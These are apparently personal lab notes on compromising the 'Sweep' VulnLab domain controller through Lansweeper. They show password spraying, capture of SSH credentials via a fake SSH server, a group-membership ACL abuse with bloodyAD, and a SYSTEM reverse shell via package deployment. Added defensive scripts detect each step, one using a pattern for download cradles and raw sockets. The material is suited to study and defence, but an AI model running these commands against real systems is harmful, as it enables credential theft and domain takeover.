Intrusionz3r0
Sweep

This is not a writeup, just my notes about VulnLabs machines.


Last updated 1 month ago

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username            Password        Method              Scope
intern              intern          Password Spraying   Domain Account + Lansweeper
svc_inventory_lnx   0|5m-U6?/uAX    SSH Sniffing        Domain Account + Lansweeper

✅ Valid Usernames

Guest
Administrator
INVENTORY$
fcla801
bcla614
jgar931
jgre808
hmar648
jwil197
grob171
jsmi791
fdav736
svc_inventory_lnx
intern
hjoh690
svc_inventory_win

🔑 Passwords list

intern
0|5m-U6?/uAX

Information Gathering

Nmap scan

# Nmap 7.94SVN scan initiated Mon Apr  7 18:26:14 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_sweep_tcp_allports -vvv 10.10.122.166
53/tcp    open  domain            syn-ack ttl 127 Simple DNS Plus
81/tcp    open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp    open  ssl/http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec      syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-07 22:30:43Z)
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 127
464/tcp   open  kpasswd5?         syn-ack ttl 127
593/tcp   open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 127
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127
3389/tcp  open  ms-wbt-server     syn-ack ttl 127 Microsoft Terminal Services
5357/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            syn-ack ttl 127 .NET Message Framing
9524/tcp  open  ssl/unknown       syn-ack ttl 127
49664/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service enumeration

DNS

  • Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

Domain SID: S-1-5-21-4292653625-3348997472-4156797480

  • Server allows null session authentication

  • Server allows guest session authentication

    • RID-Bruteforce returned a list of valid usernames.

LDAP

  • No Kerberoastable users.

  • No AS-REP roastable users.

Username as password bruteforce

❯ nxc smb 10.10.122.166 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.10.122.166   445    INVENTORY        [+] sweep.vl\intern:intern
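The username-as-password check above succeeds because one source tries one guess against many accounts, which is the pattern a defender should alert on rather than per-account lockout counters. The following detection is an added example written for these notes, not a tool from the original page: it runs over constructed logon records shaped like the fields a SIEM extracts from Security event IDs 4625 (failed logon) and 4624 (successful logon). The source address 10.8.0.5 and the timestamps are made up; the account names are the ones listed under Valid Usernames.

```python
"""Password-spray detection over Windows logon events (added example, constructed data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (timestamp, event id, target account, source address).
# 10.8.0.5 plays the spraying host; 10.10.20.7 is a normal user mistyping a password.
SAMPLE_EVENTS = [
    ("2025-04-07 18:40:00", 4625, "fcla801", "10.8.0.5"),
    ("2025-04-07 18:40:01", 4625, "bcla614", "10.8.0.5"),
    ("2025-04-07 18:40:01", 4625, "jgar931", "10.8.0.5"),
    ("2025-04-07 18:40:02", 4625, "jgre808", "10.8.0.5"),
    ("2025-04-07 18:40:02", 4625, "hmar648", "10.8.0.5"),
    ("2025-04-07 18:40:03", 4625, "jwil197", "10.8.0.5"),
    ("2025-04-07 18:40:03", 4625, "grob171", "10.8.0.5"),
    ("2025-04-07 18:40:04", 4625, "jsmi791", "10.8.0.5"),
    ("2025-04-07 18:40:04", 4625, "fdav736", "10.8.0.5"),
    ("2025-04-07 18:40:05", 4625, "hjoh690", "10.8.0.5"),
    ("2025-04-07 18:40:05", 4624, "intern", "10.8.0.5"),
    ("2025-04-07 18:41:10", 4625, "jgre808", "10.10.20.7"),
    ("2025-04-07 18:41:25", 4625, "jgre808", "10.10.20.7"),
    ("2025-04-07 18:41:40", 4624, "jgre808", "10.10.20.7"),
]


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag sources that fail against >= min_accounts distinct accounts inside `window`.

    Returns {source: {"sprayed_accounts": [...], "successful_logons": [...]}} where
    successful_logons lists accounts that logged on from the same source during the
    spray window, i.e. the guesses that landed.
    """
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, acct, src)
        for ts, eid, acct, src in events
    )
    by_source = defaultdict(list)
    for ts, eid, acct, src in parsed:
        by_source[src].append((ts, eid, acct))

    alerts = {}
    for src, rows in by_source.items():
        failures = [(ts, acct) for ts, eid, acct in rows if eid == 4625]
        successes = [(ts, acct) for ts, eid, acct in rows if eid == 4624]
        # Slide a window over the failures; the first window that spans enough
        # distinct accounts is enough to raise one alert for this source.
        for i, (start, _) in enumerate(failures):
            accounts = {acct for ts, acct in failures[i:] if ts - start <= window}
            if len(accounts) >= min_accounts:
                hits = sorted({acct for ts, acct in successes if start <= ts <= start + window})
                alerts[src] = {"sprayed_accounts": sorted(accounts), "successful_logons": hits}
                break
    return alerts


if __name__ == "__main__":
    for src, info in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {len(info['sprayed_accounts'])} accounts sprayed, "
              f"successful logons: {info['successful_logons'] or 'none'}")
```

The thresholds are deliberately low for the sample; in production the window and account count are tuned per domain, and the "successful logon from a spraying source" field is what turns a noisy alert into an incident.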

Bloodhound enumeration

❯ bloodhound-python -c all --zip -u intern -p intern -d sweep.vl -ns 10.10.122.166
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 31S
INFO: Compressing output into 20250407184605_bloodhound.zip

Users with possible privilege escalation paths

  • svc_inventory_lnx

  • JGRE808

  • svc_inventory_win

HTTP

LANSWEEPER v. 11.1.6.0

Lansweeper is an IT Asset Management (ITAM) platform that helps organizations discover, manage, and optimize their technology assets, providing visibility into IT, OT, and IoT assets, and enabling centralized IT inventory and management.

Valid credentials: intern:intern

Exploitation

Capturing SSH credentials

Discovering SSH credentials stored in Lansweeper

Lansweeper collects more asset details when scanning credentials are configured; those credentials are sent to whatever host is placed in a scanning target.

Mapping the SSH credentials to the Scan

The tester configured a Scanning Target and mapped the Linux credentials to it.

Setting up a Fake SSH service.

The tester ran a fake SSH service to capture the svc_inventory_lnx plaintext credentials.

❯ go install github.com/fffaraz/fakessh@latest
❯ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
❯ ~/go/bin/fakessh
2025/04/07 19:35:16.726181 10.10.122.166:51407 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx 0|5m-U6?/uAX
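The capture above works because the scanner authenticates with the stored password to any host that appears in a scanning target, so whoever can edit targets can redirect the credential. One compensating control is to refuse credential mappings whose targets fall outside the address ranges the scanner is meant to cover (alongside key-based authentication and restricting who may edit targets). The check below is an added example for these notes, not Lansweeper code; the managed ranges, credential labels and the 10.8.0.5 target are constructed.

```python
"""Allow-list check for scanner credential mappings (added example, constructed data)."""
import ipaddress

# Constructed allow-list: the ranges the inventory scanner is supposed to reach.
MANAGED_NETWORKS = ["10.10.122.0/24", "10.10.123.0/24"]

# Constructed (credential label, scan target) pairs as an administrator might enter
# them. The last one points outside the managed ranges and should be refused.
SAMPLE_MAPPINGS = [
    ("linux-ssh", "10.10.122.0/24"),
    ("linux-ssh", "10.10.122.10-10.10.122.20"),
    ("windows-wmi", "10.10.123.50"),
    ("linux-ssh", "10.8.0.5"),
]


def _managed_blocks(managed):
    # Merge adjacent/overlapping networks so a /23 spanning two allowed /24s is accepted.
    return list(ipaddress.collapse_addresses(ipaddress.ip_network(n) for n in managed))


def target_is_managed(target, managed=MANAGED_NETWORKS):
    """True only if every address covered by `target` lies inside the managed ranges.

    Accepts a single IP, CIDR notation or a 'first-last' range. Anything that does
    not parse as an address (hostnames included) is treated as unmanaged: resolve
    names before checking, or the allow-list can be bypassed by DNS.
    """
    try:
        if "-" in target:
            first, last = (ipaddress.ip_address(p.strip()) for p in target.split("-", 1))
            blocks = list(ipaddress.summarize_address_range(first, last))
        else:
            blocks = [ipaddress.ip_network(target, strict=False)]
    except (ValueError, TypeError):
        return False
    allowed = _managed_blocks(managed)
    return all(
        any(b.version == a.version and b.subnet_of(a) for a in allowed)
        for b in blocks
    )


def audit_credential_mappings(mappings, managed=MANAGED_NETWORKS):
    """Return the (credential, target) pairs that would send a stored credential outside the managed ranges."""
    return [(cred, tgt) for cred, tgt in mappings if not target_is_managed(tgt, managed)]


if __name__ == "__main__":
    for cred, tgt in audit_credential_mappings(SAMPLE_MAPPINGS):
        print(f"REFUSE: credential '{cred}' mapped to unmanaged target {tgt}")
```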

Abusing the DACL to obtain Remote Access

❯ bloodyAD -u 'svc_inventory_lnx' -p '0|5m-U6?/uAX' --dc-ip 10.10.122.166 add groupMember 'Lansweeper Admins' 'svc_inventory_lnx'
[+] svc_inventory_lnx added to Lansweeper Admins
❯ nxc winrm 10.10.122.166 -u 'svc_inventory_lnx' -p '0|5m-U6?/uAX'
WINRM       10.10.122.166   5985   INVENTORY        [*] Windows Server 2022 Build 20348 (name:INVENTORY) (domain:sweep.vl)
WINRM       10.10.122.166   5985   INVENTORY        [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX (Pwn3d!)
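The step above only works because the service account holds a membership-control right on the Lansweeper Admins group, which is exactly the kind of ACE an ACL review should surface before an attacker does. The script below is an added example, not part of these notes or of BloodHound: it walks constructed group data whose field names follow the shape of the legacy BloodHound collector's JSON (Properties, Aces, RightName, PrincipalSID) and reports every membership-control right held by a principal outside the expected administrative set. The domain SID, RIDs and group contents are made up for the example.

```python
"""Audit group ACEs for membership control held by non-admin principals (added example)."""
import json

# Constructed domain SID and name lookup; none of these values come from a real domain.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SID_NAMES = {
    DOMAIN_SID + "-512": "DOMAIN ADMINS@SWEEP.VL",
    DOMAIN_SID + "-1105": "SVC_INVENTORY_LNX@SWEEP.VL",
    DOMAIN_SID + "-1110": "LANSWEEPER ADMINS@SWEEP.VL",
    "S-1-5-32-544": "ADMINISTRATORS@SWEEP.VL",
}

# Constructed group objects in a BloodHound-like shape.
SAMPLE_GROUPS_JSON = json.dumps({"data": [
    {"Properties": {"name": "LANSWEEPER ADMINS@SWEEP.VL"},
     "Aces": [
         {"PrincipalSID": DOMAIN_SID + "-512", "RightName": "Owns", "IsInherited": False},
         {"PrincipalSID": DOMAIN_SID + "-512", "RightName": "GenericAll", "IsInherited": False},
         {"PrincipalSID": DOMAIN_SID + "-1105", "RightName": "AddSelf", "IsInherited": False},
     ]},
    {"Properties": {"name": "DOMAIN ADMINS@SWEEP.VL"},
     "Aces": [
         {"PrincipalSID": DOMAIN_SID + "-512", "RightName": "Owns", "IsInherited": False},
         {"PrincipalSID": "S-1-5-32-544", "RightName": "GenericAll", "IsInherited": False},
     ]},
]})

# Rights that let the holder change a group's membership directly or indirectly.
MEMBERSHIP_CONTROL_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
    "AddMember", "AddSelf", "AllExtendedRights",
}


def expected_controllers(domain_sid):
    """Principals that are expected to control group membership:
    Domain Admins (-512), Enterprise Admins (-519), BUILTIN\\Administrators, SYSTEM."""
    return {domain_sid + "-512", domain_sid + "-519", "S-1-5-32-544", "S-1-5-18"}


def find_risky_group_aces(groups_json, domain_sid, sid_names):
    """Return membership-control ACEs on groups whose holder is not an expected controller."""
    trusted = expected_controllers(domain_sid)
    findings = []
    for obj in json.loads(groups_json)["data"]:
        group = obj["Properties"]["name"]
        for ace in obj.get("Aces", []):
            sid = ace["PrincipalSID"]
            if ace["RightName"] in MEMBERSHIP_CONTROL_RIGHTS and sid not in trusted:
                findings.append({
                    "group": group,
                    "principal": sid_names.get(sid, sid),
                    "right": ace["RightName"],
                    "inherited": ace["IsInherited"],
                })
    return findings


if __name__ == "__main__":
    for f in find_risky_group_aces(SAMPLE_GROUPS_JSON, DOMAIN_SID, SID_NAMES):
        print(f"{f['principal']} holds {f['right']} on {f['group']} (inherited={f['inherited']})")
```

Findings on groups that grant remote access or application-admin rights deserve the same priority as findings on Domain Admins: the page's own chain shows a non-privileged service account turning one such ACE into WinRM access on the domain controller.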

Domain Compromise

Adding a new credential mapping

The tester used the new credentials to log into the application and configured a new set of scanning credentials.

Creating a new package deployment to obtain a reverse shell

The tester accessed the Package deployment section and created a new package. Using revshells.com, the tester generated a reverse shell, which the deployment executed, compromising the server as NT AUTHORITY\SYSTEM.
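Package deployment runs whatever it is given under the deployment service's identity, which is why it ends in a SYSTEM shell; the detection opportunity is a command interpreter spawned by that service. The detection below is an added example for these notes, not a vendor rule: it runs over constructed process-creation records shaped like Sysmon Event ID 1 fields. The deployment service image name `LansweeperService.exe` is an assumption for the example and should be replaced with the image observed in your own telemetry; the sample command lines are constructed (the encoded payload decodes to the string "ABC").

```python
"""Detect command interpreters spawned by a deployment service (added example, constructed data)."""
import re
from pathlib import PureWindowsPath

# Assumed parent image for the deployment service (not taken from vendor documentation).
DEPLOYMENT_PARENTS = {"lansweeperservice.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line traits that raise severity: encoded commands, download cradles, raw sockets.
SUSPICIOUS_CMDLINE = re.compile(
    r"(-enc(odedcommand)?\s|tcpclient|downloadstring|\biex\b|invoke-expression)", re.I
)

# Constructed Sysmon-like process creation records.
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Lansweeper\Service\LansweeperService.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBCAEMA",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files (x86)\Lansweeper\Service\LansweeperService.exe",
     "CommandLine": "msiexec.exe /i agent.msi /qn",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\Lansweeper\Service\LansweeperService.exe",
     "CommandLine": "cmd.exe /c whoami",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Process",
     "User": r"SWEEP\jgre808"},
]


def basename(path):
    """Lower-cased file name of a Windows path, usable on any host OS."""
    return PureWindowsPath(path).name.lower()


def detect_deployment_shells(events):
    """Return one finding per interpreter launched by the deployment service.

    Severity is 'high' when the command line also carries a suspicious trait,
    otherwise 'medium' (a legitimate package may still run cmd.exe).
    """
    findings = []
    for ev in events:
        if basename(ev["ParentImage"]) in DEPLOYMENT_PARENTS and basename(ev["Image"]) in SHELLS:
            findings.append({
                "user": ev["User"],
                "command": ev["CommandLine"],
                "severity": "high" if SUSPICIOUS_CMDLINE.search(ev["CommandLine"]) else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in detect_deployment_shells(SAMPLE_PROCESS_EVENTS):
        print(f"[{f['severity']}] {f['user']}: {f['command']}")
```

Because the parent is a service and the child runs as SYSTEM, there is no interactive user to explain the interpreter, so even the medium-severity hits are worth a review of who created the package and when.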